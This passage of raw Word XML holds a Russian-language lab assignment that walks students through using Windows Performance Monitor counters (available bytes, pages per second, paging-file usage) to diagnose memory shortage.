          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 если оно было запущено;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Очистите экран перед началом наблюдения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="266700" cy="288290"/>
            <wp:effectExtent l="1905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67" cstate="print"/>
                    <a:srcRect l="23157" t="10612" r="74377" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="266700" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите на копку Новый набор счетчиков </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="288290"/>
            <wp:effectExtent l="19050" t="0" r="3175"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67" cstate="print"/>
                    <a:srcRect l="20261" t="10612" r="77870" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="187325" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Наблюдение за ситуациями, порождающими недостаток памяти, рекомендуется начинать со следующих счетчиков: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Память\Доступно байт, Память\Обмен страниц в сек</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Счетчик </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Доступно байт</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> показывает текущий объем памяти в байтах, доступный для использования процессами. Счетчик </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Обмен страниц/сек</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> показывает число страниц, полученных с диска из-за необходимости обращения к этим страницам, или записанных на диск для освобождения свободной памяти в рабочем множестве.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Низкие значения счетчика </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Доступно байт</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> (4 Мбайт и меньше) указывают на общий недостаток памяти на компьютере или на то, что какая-либо программа не освобождает память. Если значение </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Обмен страниц/сек</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> достигает или превышает 20, следует внимательно изучить активность страничного обмена. Большое значение счетчика </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Обмен страниц/сек</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> может не указывать на недостаток памяти, а быть результатом работы программы, использующей файл, отображенный в памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите изменения изображения, осуществите ряд действий (запустите программу на выполнение, например  </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paint</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или Калькулятор, выполните какие-либо операции в данном приложении, сохраните, закройте);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 вставьте в отчет полученный график;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Проанализируйте полученные данные: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">начения счетчика </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Доступно байт</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> низкие или высокие. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если значение счетчика </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обмен страниц/сек</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> достигает или превышает 20, то явилось ли это результатом работы программы, использующей файл, отображенный в памяти или нет. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сделать вывод о возможной недостаточности памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Проанализируйте избыточность подкачки страниц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="360"/>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="567"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Одним из признаков недостатка памяти является частое использование системой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>файла подкачки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Файл подкачки используется для перемещения блоков памяти определенного размера, содержащих программы и данные и называющихся </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>страницами</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, из оперативной памяти на диск для освобождения памяти для других целей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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 если оно было запущено;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Очистите экран перед началом наблюдения </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="266700" cy="288290"/>
            <wp:effectExtent l="1905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67" cstate="print"/>
                    <a:srcRect l="23157" t="10612" r="74377" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="266700" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите на копку Новый набор счетчиков </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="288290"/>
            <wp:effectExtent l="19050" t="0" r="3175"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67" cstate="print"/>
                    <a:srcRect l="20261" t="10612" r="77870" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="187325" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавьте счетчики :</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Файл подкачки\% использования, Файл подкачки\% использования (пик);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустите изменения изображения, осуществите ряд действий (запустите программу на выполнение, например  </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paint</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или Калькулятор, выполните какие-либо операции в данном приложении, сохраните, закройте);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
